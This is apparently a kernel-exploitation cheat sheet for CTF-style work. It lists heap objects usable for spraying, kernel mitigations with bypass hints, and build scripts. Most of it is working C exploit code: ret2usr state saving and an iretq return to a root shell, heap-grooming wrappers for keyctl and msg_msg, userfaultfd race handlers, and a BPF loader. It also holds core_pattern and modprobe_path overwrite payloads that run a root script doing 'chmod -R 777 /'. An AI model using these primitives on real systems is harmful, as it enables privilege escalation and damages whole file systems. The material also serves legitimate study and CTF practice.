Elastic heap objects

Struct name Generic caches Constraints
struct user_key_payload kmalloc-[32,32767) at most 200 allocations (per-user key quota)
struct anon_vma_name kmalloc-[8,96)
struct msg_msg kmalloc-[64,4096) cg cache
struct msg_msgseg kmalloc-[8,4096) cg cache
struct drm_property_blob kmalloc-[96,INT_MAX)
char* description in struct key kmalloc-[8,4096)

Mitigations

  • SMEP (Supervisor Mode Execution Prevention)
    • Why?
      • Prevent RET2USER
    • Activation: -cpu kvm64,+smep in QEMU runtime argument
    • Check: cat /proc/cpuinfo | grep smep
    • Related HW feature: CR4.SMEP
  • SMAP (Supervisor Mode Access Prevention)
    • Why?
      • Prevent Stack Pivot
    • Activation: -cpu kvm64,+smap in QEMU runtime argument
    • Check: cat /proc/cpuinfo | grep smap
    • Related HW feature: CR4.SMAP, EFLAGS.AC (STAC and CLAC Assembly)
  • KASLR (Kernel Address Space Layout Randomization) / FGKASLR (Function Granular KASLR)
    • Entropy: 0xffffffff81000000 ~ 0xffffffffc0000000
    • Deactivation: -append "...nokaslr..."
  • KPTI (Kernel Page-Table Isolation)
    • Why?
      • Prevent Meltdown
    • Activation: -append "...pti=on..."
    • Check: cat /sys/devices/system/cpu/vulnerabilities/meltdown
    • Related HW feature: CR3
    • Bypass:
      • If SMAP is disabled, mmap(?, ?, ~ | MAP_POPULATE, ?, ?)
      • If ROP is allowed, use iretq in swapgs_restore_regs_and_return_to_usermode
  • KADR (Kernel Address Display Restriction)
    • Why?
      • Hide address in /proc/kallsyms
    • Check: cat /proc/sys/kernel/kptr_restrict
  • Unpack CPIO: cpio -idv <../rootfs.cpio
  • Pack CPIO: find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs_updated.cpio

Debugging

  • Extract vmlinux from bzImage from https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux:
    •       #!/bin/sh
      # SPDX-License-Identifier: GPL-2.0-only
      # ----------------------------------------------------------------------
      # extract-vmlinux - Extract uncompressed vmlinux from a kernel image
      #
      # Inspired from extract-ikconfig
      # (c) 2009,2010 Dick Streefland <[email protected]>
      #
      # (c) 2011      Corentin Chary <[email protected]>
      #
      # ----------------------------------------------------------------------
      
      # If $1 looks like an ELF file, dump it to stdout and exit the script.
      check_vmlinux()
      {
      	# Use readelf to check if it's a valid ELF
      	# TODO: find a better to way to check that it's really vmlinux
      	#       and not just an elf
      	readelf -h $1 > /dev/null 2>&1 || return 1
      
      	cat $1
      	exit 0
      }
      
      # Scan $img for the magic bytes in $1 and pipe everything from each match
      # through the decompressor in $3; $2 is a short alphabet used to rewrite
      # the magic so grep can anchor on it.
      try_decompress()
      {
      	# The obscure use of the "tr" filter is to work around older versions of
      	# "grep" that report the byte offset of the line instead of the pattern.
      
      	# Try to find the header ($1) and decompress from here
      	for	pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
      	do
      		pos=${pos%%:*}
      		tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
      		check_vmlinux $tmp
      	done
      }
      
      # Check invocation:
      me=${0##*/}
      img=$1
      if	[ $# -ne 1 -o ! -s "$img" ]
      then
      	echo "Usage: $me <kernel-image>" >&2
      	exit 2
      fi
      
      # Prepare temp files:
      tmp=$(mktemp /tmp/vmlinux-XXX)
      trap "rm -f $tmp" 0
      
      # Try each known compression signature and decompress from its offset:
      try_decompress '\037\213\010' xy    gunzip
      try_decompress '\3757zXZ\000' abcde unxz
      try_decompress 'BZh'          xy    bunzip2
      try_decompress '\135\0\0\0'   xxx   unlzma
      try_decompress '\211\114\132' xy    'lzop -d'
      try_decompress '\002!L\030'   xxx   'lz4 -d'
      try_decompress '(\265/\375'   xxx   unzstd
      
      # Finally check for uncompressed images or objects:
      check_vmlinux $img
      
      # Bail out:
      echo "$me: Cannot find vmlinux." >&2

Build Exploit Code

  • Use GLIBC: gcc exploit.c -o exploit -static
  • Use MUSL-GCC: /usr/local/musl/bin/musl-gcc exploit.c -o exploit -static
    • or: gcc -S exploit.c -o exploit.S; musl-gcc exploit.S -o exploit.elf

Code Snippet

      #include <stdio.h>
#include <stdlib.h>

// Typical x86-64 kernel text range; used to sanity-check leaked pointers.
#define KERNEL_BASE_START 0xffffffff81000000ull
#define KERNEL_BASE_END 0xffffffffc0000000ull
// Mask to round a leaked kernel text address down to a 1 MiB boundary.
#define KERNEL_BASE_MASK (~0x00000000000fffffull)
#define IS_IN_KERNEL_RANGE(addr) \
  ((addr) >= KERNEL_BASE_START && (addr) < KERNEL_BASE_END)

// BUGFIX: fully parenthesized so expressions like `MIN(a, b) + 1` group
// correctly (the old form expanded to `(a) < (b) ? (a) : (b) + 1`).
// Arguments are still evaluated twice — avoid side effects (e.g. MIN(i++, j)).
#define MIN(x, y) (((x) < (y)) ? (x) : (y))
#define MAX(x, y) (((x) > (y)) ? (x) : (y))

// Forward declarations so the helpers may be referenced before definition.
static void get_enter_to_continue(const char* msg);
static void fatal(const char* msg);

// Print a prompt and block until the user sends a character (debugging aid
// to pause the exploit at interesting points).
static void get_enter_to_continue(const char* msg) {
  puts(msg);
  (void)getchar();
}

// Report the failing call via perror() and terminate the process.
static void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");  // uncomment to pause before exit
  exit(-1);
}
      #include <stdint.h>

// Userland CS/SS/RSP/RFLAGS saved before triggering the bug; consumed by
// restore_state() (or a hand-built iretq ROP frame) to return to ring 3.
uint64_t user_cs, user_ss, user_sp, user_rflags;
// Snapshot the current user-mode segment registers, stack pointer and flags.
// NOTE: Intel-syntax inline asm — must be compiled with -masm=intel
// (see the musl-gcc build script below).
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}

// Spawn an interactive shell; intended to run in ring 3 after privilege
// escalation. execve() replaces the current process image on success.
static void get_shell() {
  puts("[+] Get shell!");
  char* argv[] = {"/bin/sh", NULL};
  char* envp[] = {NULL};
  execve("/bin/sh", argv, envp);
}

// Return from kernel mode to user mode by hand-crafting an iretq frame on
// the current stack: [rsp+0x00]=RIP, +0x08=CS, +0x10=RFLAGS, +0x18=RSP,
// +0x20=SS. swapgs restores the userland GS base first.
// NOTE(review): assumes rsp points at 5 scratch qwords we own — confirm at
// the call site (typically the tail of a kernel payload).
static void restore_state() {
  asm volatile(
      "swapgs;\n"
      "mov qword ptr [rsp+0x20], %[u_ss];\n"
      "mov qword ptr [rsp+0x18], %[u_sp];\n"
      "mov qword ptr [rsp+0x10], %[u_rflags];\n"
      "mov qword ptr [rsp+0x08], %[u_cs];\n"
      "mov qword ptr [rsp+0x00], %[u_ret];\n"
      "iretq;\n" ::[u_cs] "r"(user_cs),
      [u_ss] "r"(user_ss), [u_sp] "r"(user_sp), [u_rflags] "r"(user_rflags),
      [u_ret] "r"(get_shell));
}

// Equivalent iretq frame when built as a ROP chain (low address first):
// *rop_buf++ = (uint64_t)(get_shell); // user_rip
// *rop_buf++ = (uint64_t)(user_cs);
// *rop_buf++ = (uint64_t)(user_rflags);
// *rop_buf++ = (uint64_t)(user_sp);
// *rop_buf++ = (uint64_t)(user_ss);
      #define _GNU_SOURCE
#include <sched.h>

void pin_to_core(size_t core);

// Restrict the calling thread to a single CPU so subsequent heap-shaping
// allocations hit the same per-CPU slab caches.
void pin_to_core(size_t core) {
  cpu_set_t mask;

  CPU_ZERO(&mask);
  CPU_SET(core, &mask);

  if (sched_setaffinity(0, sizeof(mask), &mask) != 0) {
    fatal("sched_setaffinity");
  }
}
      #include <linux/keyctl.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <syscall.h>
#include <unistd.h>

/**
 * type must be "keyring", "user", "logon", or "big_key"
 */
static int32_t sys_add_key(const char *type, const char *desc,
                           const void *payload, size_t plen, int ringid);
static int32_t sys_keyctl(int cmd, ...);
static int32_t sys_revoke_key(int32_t key);
static int32_t sys_update_key(int32_t key, void *payload, size_t size);
static int32_t sys_read_key(int32_t key, char *buf, size_t size);

// add_key(2) wrapper: allocates a struct user_key_payload of plen + header in
// the kernel; returns the new key's serial number, or -1 with errno set.
static int32_t sys_add_key(const char *type, const char *desc,
                           const void *payload, size_t plen, int ringid) {
  return syscall(__NR_add_key, type, desc, payload, plen, ringid);
}
// Variadic wrapper around the keyctl(2) syscall.
// CONTRACT: this function always reads four variadic `long` arguments, so
// every caller must supply four (pad with 0). Reading va_args that were
// never passed is undefined behavior — the wrappers below were fixed to
// pad their argument lists accordingly.
static int32_t sys_keyctl(int cmd, ...) {
  va_list ap;
  long arg2, arg3, arg4, arg5;
  va_start(ap, cmd);
  arg2 = va_arg(ap, long);
  arg3 = va_arg(ap, long);
  arg4 = va_arg(ap, long);
  arg5 = va_arg(ap, long);
  va_end(ap);
  return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5);
}
// Revoke a key; returns 0 or -1 with errno set.
static int32_t sys_revoke_key(int32_t key) {
  return sys_keyctl(KEYCTL_REVOKE, (long)key, 0L, 0L, 0L);
}
// Read a key's payload into buf; returns the payload length or -1.
static int32_t sys_read_key(int32_t key, char *buf, size_t size) {
  return sys_keyctl(KEYCTL_READ, (long)key, (long)buf, (long)size, 0L);
}
// Replace a key's payload (triggers a user_key_payload reallocation).
static int32_t sys_update_key(int32_t key, void *payload, size_t size) {
  return sys_keyctl(KEYCTL_UPDATE, (long)key, (long)payload, (long)size, 0L);
}
      #define _GNU_SOURCE
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag);
int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag);

// Send `size` bytes as a System V message (allocates a msg_msg of
// ~size+0x30 in the kernel). Returns msgsnd()'s result, or -1 on OOM.
int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  if (m == NULL) {
    return -1;  // BUGFIX: the old code dereferenced an unchecked malloc()
  }
  m->mtype = mtype;
  memcpy(m->mtext, data, size);

  int ret = msgsnd(msgqid, m, size, mflag);

  free(m);
  return ret;
}
// Receive up to `size` bytes into `data`. Returns the number of bytes
// received (msgrcv()'s result), or -1 on error/OOM.
int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  if (m == NULL) {
    return -1;  // BUGFIX: unchecked malloc()
  }
  m->mtype = mtype;

  int ret = msgrcv(msgqid, m, size, mtype, mflag);
  // BUGFIX: only copy what was actually received; the old code copied
  // `size` bytes even on failure, reading indeterminate heap bytes.
  if (ret > 0) {
    memcpy(data, m->mtext, (size_t)ret);
  }

  free(m);
  return ret;
}
      // Check /proc/sys/vm/unprivileged_userfaultfd

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

// Create a userfaultfd, register [addr, addr+len) for missing-page faults,
// and spawn `handler` on its own thread to service them. Returns the fd.
// Aborts via fatal() on any failure.
int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
  struct uffdio_api api_arg;
  struct uffdio_register reg_arg;
  pthread_t handler_thread;

  int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    fatal("syscall(__NR_userfaultfd)");
  }

  // Handshake: announce the API version we expect.
  api_arg.api = UFFD_API;
  api_arg.features = 0;
  if (ioctl(uffd, UFFDIO_API, &api_arg) < 0) {
    fatal("ioctl(UFFDIO_API)");
  }

  // Watch the requested range for not-present (missing) page faults.
  reg_arg.range.start = (uint64_t)addr;
  reg_arg.range.len = len;
  reg_arg.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &reg_arg) < 0) {
    fatal("ioctl(UFFDIO_REGISTER)");
  }

  // The fd is smuggled to the handler through the void* argument.
  if (pthread_create(&handler_thread, NULL, handler, (void*)(uint64_t)uffd) <
      0) {
    fatal("pthread_create");
  }

  return uffd;
}

// Template userfaultfd handler thread: waits for missing-page faults on the
// registered range and resolves each one by copying a staging page in.
static void* userfault_template_handler(void* args) {
  // BUGFIX: the original referenced `target_cpu`, a local variable of
  // pin_to_core() that is not in scope here (compile error). Build our own
  // affinity mask instead.
  // NOTE(review): pins to core 0 — keep in sync with the pin_to_core() call
  // in the main thread.
  cpu_set_t handler_cpu;
  CPU_ZERO(&handler_cpu);
  CPU_SET(0, &handler_cpu);
  if (sched_setaffinity(0, sizeof(handler_cpu), &handler_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  // Staging page whose contents become the contents of the faulted page.
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_template_handler: mmap");
  }

  static struct uffd_msg msg;  // static: assumes a single handler instance
  struct uffdio_copy copy;
  struct pollfd pollfd;

  puts("[*] userfault_template_handler: waiting for page fault...");
  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_template_handler: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_template_handler: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal("userfault_template_handler: msg.event != UFFD_EVENT_PAGEFAULT");
    }

    printf("[*] userfault_template_handler: addr=0x%llx, flag=0x%llx\n",
           msg.arg.pagefault.address, msg.arg.pagefault.flags);

    // Main Routine
    copy.src = (uint64_t)page;  // data of page will be data of faulted page
    // BUGFIX: UFFDIO_COPY requires a page-aligned destination; the reported
    // fault address may point into the middle of the page.
    copy.dst = (uint64_t)msg.arg.pagefault.address & ~0xfffULL;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_template_handler: ioctl(UFFDIO_COPY)");
    }
  }

  munmap(page, 0x1000);
  return NULL;
}
      // Check /proc/sys/kernel/unprivileged_bpf_disabled

#include <asm-generic/socket.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#include "bpf_insn.h"

// Thin wrapper over the bpf(2) syscall; always passes the full attr size.
int bpf(int cmd, union bpf_attr* attrs) {
  long rc = syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
  return (int)rc;
}

// Create a BPF_MAP_TYPE_ARRAY map with int keys and val_size-byte values.
// Returns the map fd; aborts via fatal() on failure.
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
// Store *pval at index `key` of the array map. Aborts via fatal() on error.
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,  // create-or-update
  };

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
// Read the value at index `key` of the array map into *pval.
// Returns the syscall result directly (no abort on failure).
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };
  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// Template: build, load and attach a minimal socket-filter BPF program,
// then trigger it once. Fill in the instruction list for a real exploit.
void bpf_template() {
  char verifier_log[0x10000];  // verifier output, printed on load failure

  // Shared map used to exchange data between the BPF program and userland.
  uint64_t val = 0;
  int mapfd = bpf_map_create(sizeof(uint64_t), 1);
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // Instructions

      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,  // verbose verifier log
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  // Attach the filter to one end of a socketpair; writing to the other end
  // runs the program once per datagram.
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the BPF program
  write(socks[1], "UNIGURI", 7);

  // Read back whatever the program stored in the map.
  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
      /* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */
/* eBPF instruction mini library */
/* NOTE: vendored verbatim from the Linux kernel tree (samples/bpf/bpf_insn.h);
 * keep byte-identical to upstream for easy diffing. */
#ifndef __BPF_INSN_H
#define __BPF_INSN_H

struct bpf_insn;

/* ArgX, context and stack frame pointer register positions. Note,
 * Arg1, Arg2, Arg3, etc are used as argument mappings of function
 * calls in BPF_CALL instruction.
 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

/* Additional register mappings for converted user programs. */
#define BPF_REG_A BPF_REG_0
#define BPF_REG_X BPF_REG_7
#define BPF_REG_TMP BPF_REG_8

/* BPF program can access up to 512 bytes of stack space. */
#define MAX_BPF_STACK 512

/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */

#define BPF_ALU64_REG(OP, DST, SRC)                          \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                         \
                     .src_reg = SRC,                         \
                     .off = 0,                               \
                     .imm = 0})

#define BPF_ALU32_REG(OP, DST, SRC)                        \
  ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                       \
                     .src_reg = SRC,                       \
                     .off = 0,                             \
                     .imm = 0})

/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */

#define BPF_ALU64_IMM(OP, DST, IMM)                          \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                         \
                     .src_reg = 0,                           \
                     .off = 0,                               \
                     .imm = IMM})

#define BPF_ALU32_IMM(OP, DST, IMM)                        \
  ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                       \
                     .src_reg = 0,                         \
                     .off = 0,                             \
                     .imm = IMM})

/* Endianess conversion, cpu_to_{l,b}e(), {l,b}e_to_cpu() */

#define BPF_ENDIAN(TYPE, DST, LEN)                              \
  ((struct bpf_insn){.code = BPF_ALU | BPF_END | BPF_SRC(TYPE), \
                     .dst_reg = DST,                            \
                     .src_reg = 0,                              \
                     .off = 0,                                  \
                     .imm = LEN})

/* Short form of mov, dst_reg = src_reg */

#define BPF_MOV64_REG(DST, SRC)                           \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_X, \
                     .dst_reg = DST,                      \
                     .src_reg = SRC,                      \
                     .off = 0,                            \
                     .imm = 0})

#define BPF_MOV32_REG(DST, SRC)                         \
  ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_X, \
                     .dst_reg = DST,                    \
                     .src_reg = SRC,                    \
                     .off = 0,                          \
                     .imm = 0})

/* Short form of mov, dst_reg = imm32 */

#define BPF_MOV64_IMM(DST, IMM)                           \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, \
                     .dst_reg = DST,                      \
                     .src_reg = 0,                        \
                     .off = 0,                            \
                     .imm = IMM})

#define BPF_MOV32_IMM(DST, IMM)                         \
  ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_K, \
                     .dst_reg = DST,                    \
                     .src_reg = 0,                      \
                     .off = 0,                          \
                     .imm = IMM})

/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */
#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)

/* NOTE: expands to TWO struct bpf_insn entries (wide instruction). */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                           \
  ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM,           \
                     .dst_reg = DST,                              \
                     .src_reg = SRC,                              \
                     .off = 0,                                    \
                     .imm = (__u32)(IMM)}),                       \
      ((struct bpf_insn){.code = 0, /* zero is reserved opcode */ \
                         .dst_reg = 0,                            \
                         .src_reg = 0,                            \
                         .off = 0,                                \
                         .imm = ((__u64)(IMM)) >> 32})

#ifndef BPF_PSEUDO_MAP_FD
#define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */

#define BPF_LD_ABS(SIZE, IMM)                                   \
  ((struct bpf_insn){.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
                     .dst_reg = 0,                              \
                     .src_reg = 0,                              \
                     .off = 0,                                  \
                     .imm = IMM})

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                             \
                     .src_reg = SRC,                             \
                     .off = OFF,                                 \
                     .imm = 0})

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                             \
                     .src_reg = SRC,                             \
                     .off = OFF,                                 \
                     .imm = 0})

/* Atomic memory add, *(uint *)(dst_reg + off16) += src_reg */

#define BPF_STX_XADD(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_XADD, \
                     .dst_reg = DST,                              \
                     .src_reg = SRC,                              \
                     .off = OFF,                                  \
                     .imm = 0})

/* Memory store, *(uint *) (dst_reg + off16) = imm32 */

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                         \
  ((struct bpf_insn){.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                            \
                     .src_reg = 0,                              \
                     .off = OFF,                                \
                     .imm = IMM})

/*
 * Atomic operations:
 *
 *   BPF_ADD                  *(uint *) (dst_reg + off16) += src_reg
 *   BPF_AND                  *(uint *) (dst_reg + off16) &= src_reg
 *   BPF_OR                   *(uint *) (dst_reg + off16) |= src_reg
 *   BPF_XOR                  *(uint *) (dst_reg + off16) ^= src_reg
 *   BPF_ADD | BPF_FETCH      src_reg = atomic_fetch_add(dst_reg + off16,
 * src_reg); BPF_AND | BPF_FETCH      src_reg = atomic_fetch_and(dst_reg +
 * off16, src_reg); BPF_OR | BPF_FETCH       src_reg = atomic_fetch_or(dst_reg +
 * off16, src_reg); BPF_XOR | BPF_FETCH      src_reg = atomic_fetch_xor(dst_reg
 * + off16, src_reg); BPF_XCHG                 src_reg = atomic_xchg(dst_reg +
 * off16, src_reg) BPF_CMPXCHG              r0 = atomic_cmpxchg(dst_reg + off16,
 * r0, src_reg)
 */

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF)                      \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \
                     .dst_reg = DST,                                \
                     .src_reg = SRC,                                \
                     .off = OFF,                                    \
                     .imm = OP})

/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc +
 * off16 */

#define BPF_JMP_REG(OP, DST, SRC, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                       \
                     .src_reg = SRC,                       \
                     .off = OFF,                           \
                     .imm = 0})

/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_REG(OP, DST, SRC, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                         \
                     .src_reg = SRC,                         \
                     .off = OFF,                             \
                     .imm = 0})

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16
 */

#define BPF_JMP_IMM(OP, DST, IMM, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                       \
                     .src_reg = 0,                         \
                     .off = OFF,                           \
                     .imm = IMM})

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                         \
                     .src_reg = 0,                           \
                     .off = OFF,                             \
                     .imm = IMM})

/* Function call */

#define BPF_EMIT_CALL(FUNC)                      \
  ((struct bpf_insn){.code = BPF_JMP | BPF_CALL, \
                     .dst_reg = 0,               \
                     .src_reg = 0,               \
                     .off = 0,                   \
                     .imm = (FUNC)})

/* Raw code statement block */

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
  ((struct bpf_insn){                          \
      .code = CODE, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = IMM})

/* Program exit */

#define BPF_EXIT_INSN()                          \
  ((struct bpf_insn){.code = BPF_JMP | BPF_EXIT, \
                     .dst_reg = 0,               \
                     .src_reg = 0,               \
                     .off = 0,                   \
                     .imm = 0})

#endif
      #include <stdlib.h>

// Arbitrary-write target: overwrite the kernel's core_pattern with this
// string. The leading '|' makes the kernel exec /tmp/evil.sh (as root) as
// the core-dump handler whenever any process crashes.
const char* new_core_pattern = "|/tmp/evil.sh";

// NOTE: snippet, not a standalone program — paste into the exploit after
// the core_pattern overwrite has been performed.
system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
system("chmod +x /tmp/evil.sh");
system("ulimit -c unlimited");  // NOTE(review): runs in a child shell, so it
                                // does not raise THIS process's limit — use
                                // setrlimit(RLIMIT_CORE, ...) instead; verify
// Deliberately crash with an invalid write so the kernel invokes the
// (now attacker-controlled) core-dump handler.
uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe;
*evil_ptr = 0xdeadbeefcafebebe;
      #include <stdlib.h>

// Arbitrary-write target: overwrite the kernel's modprobe_path with this
// string so the kernel runs /tmp/evil.sh (as root) instead of modprobe.
const char* new_modprobe = "/tmp/evil.sh";

// NOTE: snippet, not a standalone program — paste into the exploit after
// the modprobe_path overwrite. Executing a file with an unknown magic
// ("\xde\xad\xbe\xef") makes the kernel invoke the modprobe helper.
system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
system("chmod +x /tmp/evil.sh");
system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
system("chmod +x /tmp/pwn");
system("/tmp/pwn");
      #include <stdio.h>
#include <sys/prctl.h>

// New task comm name (useful for locating this task's structures in kernel
// heap leaks). PR_SET_NAME truncates to 15 characters + NUL.
const char new_process_name[] = "uniguri";

// NOTE: snippet, not a standalone program — paste inside a function.
if (prctl(PR_SET_NAME, new_process_name) == -1) {
  printf("[-] Failed to set process name\n");
  return -1;
}

Scripts

      #!/bin/sh
# build_exploit.sh — statically compile one exploit source file with musl-gcc.
# Usage: ./build_exploit.sh <source_file.c>
# Output binary is placed next to the source, named without the .c extension.

# Check if an argument is provided
if [ $# -eq 0 ]; then
  echo "Usage: $0 <source_file.c>"
  exit 1
fi

# Extract the base name without the .c extension
SOURCE_FILE=$1
OUTPUT_FILE=$(dirname "$SOURCE_FILE")/$(basename "$SOURCE_FILE" .c)

# Compile the file and branch on the command itself instead of inspecting $?
# afterwards (avoids the classic "$? already clobbered" pitfall).
# -masm=intel is required by the Intel-syntax inline asm in the snippets.
if musl-gcc "$SOURCE_FILE" -masm=intel -o "$OUTPUT_FILE" -static -pthread; then
  echo "Compilation successful: $OUTPUT_FILE"
else
  echo "Compilation failed."
  exit 1
fi
      #!/bin/sh
# copy_exploit.sh — copy a built exploit binary into the rootfs staging dir.
